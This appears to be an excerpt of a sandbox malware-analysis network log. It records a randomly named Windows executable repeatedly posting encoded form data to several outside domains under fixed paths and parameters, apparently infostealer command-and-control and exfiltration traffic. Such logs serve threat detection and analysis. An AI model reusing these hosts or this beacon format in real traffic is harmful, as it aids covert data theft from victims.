                                                                            Data Ascii: GX6Lp2F=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/6WtUCsYnEbdOFiK65kbrK1B2ij4EXa9Nucqm+U3+5oIqEmNwWYIxDaA/JBl0yK6Iq9Ve9fz1gtKiJ142N+c5rvgO18o7OwPRl+BrM1Zlnd+2P8MqbLcKhi4EspfYz8f1sqo7QiRPbwC5WfTg9KZ5FQRf6htQ4+x+gFVBkGOA==
                                                                            Nov 24, 2024 08:24:14.316293001 CET  533  IN  HTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:24:14 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                            31  192.168.2.10  50012  209.74.77.109  80  4764  C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 24, 2024 08:24:15.723871946 CET  1725  OUT  POST /4r26/ HTTP/1.1
                                                                            Host: www.moviebuff.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.moviebuff.info
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.moviebuff.info/4r26/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:24:16.977004051 CET  533  IN  HTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:24:16 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                            32  192.168.2.10  50013  209.74.77.109  80  4764  C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            Nov 24, 2024 08:24:18.390542030 CET  424  OUT  GET /4r26/?H8=BpFD-28hKhrD&GX6Lp2F=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80eqplMgmGVUTbCPRmhwbXi4X3f8N+iA== HTTP/1.1
                                                                            Host: www.moviebuff.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
Nov 24, 2024 08:24:19.666932106 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Sun, 24 Nov 2024 07:24:19 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.10 | 50014 | 199.59.243.227 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:24:25.535521984 CET | 688 | OUT | POST /rfcw/ HTTP/1.1
                                                                            Host: www.whisperart.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.whisperart.net
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.whisperart.net/rfcw/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=4B9Qn/Iw/DjIbM1SIwS5GMvSqANTlh9OV1oz2zzPZ1bVpb2CRBv+v5Z0sf+TugN96ZdKFSMIEm1FtPDRxu/VwLd0E00Bd9Jvo4TO/sZH+TnOG6dhXX8QKV9t+Kk4xaou/752+p5a7Eqm7tuzGxJz+tz1dRhfLXohsKcgfbCBPsGMAQ4taodt6dgLwD8G
Nov 24, 2024 08:24:26.656820059 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Sun, 24 Nov 2024 07:24:26 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1122
                                                                            x-request-id: 39b8dc3d-b218-44a1-ac62-7b2f7b6cafa7
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                            set-cookie: parking_session=39b8dc3d-b218-44a1-ac62-7b2f7b6cafa7; expires=Sun, 24 Nov 2024 07:39:26 GMT; path=/
                                                                            connection: close
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 24, 2024 08:24:26.656852007 CET | 575 | IN
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzliOGRjM2QtYjIxOC00NGExLWFjNjItN2IyZjdiNmNhZmE3IiwicGFnZV90aW1lIjoxNzMyNDMzMD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.10 | 50015 | 199.59.243.227 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:24:28.206604958 CET | 712 | OUT | POST /rfcw/ HTTP/1.1
                                                                            Host: www.whisperart.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.whisperart.net
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.whisperart.net/rfcw/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=4B9Qn/Iw/DjIatFSJXG5HsvRpANT8x9KV1kz23jfeALVq6GCegv+/pZ0j/+sgAN66YhsFTwIEmxFtK/Rx5DKq7d6dk0HZ9Jvo4TO/sNt+T/OGLthXzITH19s5Kk4mKoq/75Q+sYH7GSm7oSzGAJwndzzQxghL2dSs51beJO3PqTkHxFqL586pq8F+FJsdo4bCu/25zHyYJkWyarg4w==
Nov 24, 2024 08:24:29.332048893 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Sun, 24 Nov 2024 07:24:28 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1122
                                                                            x-request-id: 31a7e703-fbbe-423f-b1ec-e2208f1e4474
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                            set-cookie: parking_session=31a7e703-fbbe-423f-b1ec-e2208f1e4474; expires=Sun, 24 Nov 2024 07:39:29 GMT; path=/
                                                                            connection: close
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 24, 2024 08:24:29.332076073 CET | 575 | IN
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzFhN2U3MDMtZmJiZS00MjNmLWIxZWMtZTIyMDhmMWU0NDc0IiwicGFnZV90aW1lIjoxNzMyNDMzMD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.10 | 50016 | 199.59.243.227 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:24:30.868143082 CET | 1725 | OUT | POST /rfcw/ HTTP/1.1
                                                                            Host: www.whisperart.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.whisperart.net
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.whisperart.net/rfcw/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=4B9Qn/Iw/DjIatFSJXG5HsvRpANT8x9KV1kz23jfeDrVqI+CfDH+t5Z0qf+XgANn6ZJgFT9zEkZFrvzRk4DK/rd6A00Gd9JAo4D0/sdt+T/OGJ1hD38TF19t+Kk0xapP/7gl+sUX71am7MOzWmlwudzxTxgpL2BNs5ogeI6NPtfkDQp8Y9I76ZUK9GhJZe8lMt+TvBTJNsZJxLWfle2fUGR/oJsv2UXOSreaNdEHrmiLXK1EHfuyPkymU/2SkyU227nj60DX4ysHJNJ5u5RfXlOi57SVUrnGnQxQnXnkoo+BoiBJM8O4v1zBxbPAawaOsIRYaDgZA31luQb9t2QafZOr3RtiqrHYCgM7kpJ8e9oeWQVnnFAuzh63SEjClgXSWmBnemej/UWpTa1ZLduAjTMz9T+6Nl2CvfEC+aEmVOKgvjs/EjMYK+aRNfTnzGwhc0+0vLK9BrdwZgCRTDHIlgUn2OsarwicnZdNUqrrqPUKBGVHlzRPZEO52Fp/S4I9oETjEAuvEv0/lQ+HjiGZ4LXZm8E+PMj6iHlITNFQ7f6UNGeAlb6mqQgzqnZjzWcYUxiRWk2t7zEqki9L5nuzANQ3r8MsMQ3DEtMtBjyGlAaZRWX65j6yp7taRZt2UKCnoqNJKN3P12lxlHIKPJWNVcK3SXLN7o6fMZl9AZ7c//d+wW7Y076vn1IK9uiaxdOBec4XKcq0zgZHUGN8X/oEN2t/XcTfVaT0Se/K24M+bfs9NknT5ao1rBhqwEY5ZMliDTY8Ait9NmmsvmuaD3+xFtou+sVK8RvuAHUSkJz9pebmjRX51AHap3b6VhyvrGKGltYqpqMvtGvaoDUdhEELxYL+BuPfYUVymjkcZjMlFI/fPVDVwKFVD/5ooPySwqcDvcIlSUGdMW1FJYG4mw4Nh9pH/E00TB7+f/rbkvhUHLmzuRQVaDhl5215vCu08bNLPqb6D1RmyxR8Z5PYEuh33SI4kGPIimBIAU2saM9Hfn1Z [TRUNCATED]
Nov 24, 2024 08:24:31.942544937 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Sun, 24 Nov 2024 07:24:30 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1122
                                                                            x-request-id: 6cdf13dd-254b-4faf-a918-51f61e650d02
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                            set-cookie: parking_session=6cdf13dd-254b-4faf-a918-51f61e650d02; expires=Sun, 24 Nov 2024 07:39:31 GMT; path=/
                                                                            connection: close
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 24, 2024 08:24:31.942559004 CET | 575 | IN
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmNkZjEzZGQtMjU0Yi00ZmFmLWE5MTgtNTFmNjFlNjUwZDAyIiwicGFnZV90aW1lIjoxNzMyNDMzMD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.10 | 50017 | 199.59.243.227 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:24:33.553937912 CET | 424 | OUT | GET /rfcw/?GX6Lp2F=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg88l2Cxg6VY9qmpf/gPts30TBLrJ7Cw==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.whisperart.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
Nov 24, 2024 08:24:34.684895039 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Sun, 24 Nov 2024 07:24:34 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1458
                                                                            x-request-id: 05bf021c-a987-499b-9d80-300277c48802
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qZ2KlLuanUne6JcQdTvSr2tKEg3vjnNZDl27tDurnLck67LVWbfmMTU49k8cYqwHsr2uM+DXtJWu5WZh/r/zjw==
                                                                            set-cookie: parking_session=05bf021c-a987-499b-9d80-300277c48802; expires=Sun, 24 Nov 2024 07:39:34 GMT; path=/
                                                                            connection: close
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qZ2KlLuanUne6JcQdTvSr2tKEg3vjnNZDl27tDurnLck67LVWbfmMTU49k8cYqwHsr2uM+DXtJWu5WZh/r/zjw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 24, 2024 08:24:34.685058117 CET | 911 | IN
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDViZjAyMWMtYTk4Ny00OTliLTlkODAtMzAwMjc3YzQ4ODAyIiwicGFnZV90aW1lIjoxNzMyNDMzMD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.10 | 50018 | 74.208.236.156 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:24:40.421927929 CET | 706 | OUT | POST /uvge/ HTTP/1.1
                                                                            Host: www.christinascuties.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.christinascuties.net
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.christinascuties.net/uvge/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=UP9LOq8C5EzLoNDvsJxdcyIUxe2SSbr7XBtwvICNe4/zoqXOvduKJdpt0rB0jdWD4Y/0Z65YalC2uHYZfovyNH/g7v7/VCU/eozxpzWgJ+DKNJueHXTjCt+MgPiXZjDsL165BXeQYyjDHmOmvHp3urQFDOmu1aV6Hthju6Qcbz7AHz9He7fkyu4m7/pi
                                                                            Nov 24, 2024 08:24:41.560266972 CET | 580 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Sun, 24 Nov 2024 07:24:41 GMT
                                                                            Server: Apache
                                                                            Content-Encoding: gzip


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            38 | 192.168.2.10 | 50019 | 74.208.236.156 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:24:43.304617882 CET | 730 | OUT | POST /uvge/ HTTP/1.1
                                                                            Host: www.christinascuties.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.christinascuties.net
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.christinascuties.net/uvge/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=UP9LOq8C5EzLrtzvruddLCIX++2Sc7r3XBxwvNjACaLzoP7OuYaKOdpt/LB1ndWy4YzWZ+5Yaki2uGoZeb3xNX/m2P79RCU/eozxpzCGJ+bKN5eeISzkKN+PnPiXITDoL16fBWSuY0vDHmemh1B2grQHHOnEzKUkF8Fhgo8UaQHEJyAAPq+zhZko15cIlyBafiHD4X99I25ADCfdxA==
                                                                            Nov 24, 2024 08:24:44.480386019 CET | 580 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Sun, 24 Nov 2024 07:24:44 GMT
                                                                            Server: Apache
                                                                            Content-Encoding: gzip


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            39 | 192.168.2.10 | 50020 | 74.208.236.156 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:24:46.226701021 CET | 1743 | OUT | POST /uvge/ HTTP/1.1
                                                                            Host: www.christinascuties.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.christinascuties.net
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.christinascuties.net/uvge/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F= [TRUNCATED]
                                                                            Nov 24, 2024 08:24:47.407911062 CET | 580 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Sun, 24 Nov 2024 07:24:47 GMT
                                                                            Server: Apache
                                                                            Content-Encoding: gzip


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            40 | 192.168.2.10 | 50021 | 74.208.236.156 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:24:48.889106989 CET | 430 | OUT | GET /uvge/?H8=BpFD-28hKhrD&GX6Lp2F=ZNVrNdoQnhuwr8rXgpUIPH4b9LjaUdnqJW8zgtLXFLLe8onm6IbnH5k6/OJNpvCzw5jcHu1YLU/U3UlnXJzWKm/g482Cdi9CT/rc1yKmW5XeMaWPeg== HTTP/1.1
                                                                            Host: www.christinascuties.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:24:50.032517910 CET | 770 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 626
                                                                            Connection: close
                                                                            Date: Sun, 24 Nov 2024 07:24:49 GMT
                                                                            Server: Apache
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            41 | 192.168.2.10 | 50022 | 68.66.226.92 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:24:55.938232899 CET | 673 | OUT | POST /bokt/ HTTP/1.1
                                                                            Host: www.717hy.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.717hy.net
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.717hy.net/bokt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=kqa2EAJEmVzzL1LHfnn/9QxVy0fXIuq0llbgBrCUUxXOsoVGtMdBYu7EmIP7ro7uW56CBr6opcEj/XOihlgGPAqiESk4mT2H7AQD/BZft1IBV741ZxM32uJPbfnvvohyrJ/qYeU/Ou5H+bLz0MP/tk75/aqb4eo1e8Pswz06B5GZBbB/0tyTocyaglV8
                                                                            Nov 24, 2024 08:24:57.221766949 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:24:57 GMT
                                                                            server: LiteSpeed
                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-content-type-options: nosniff
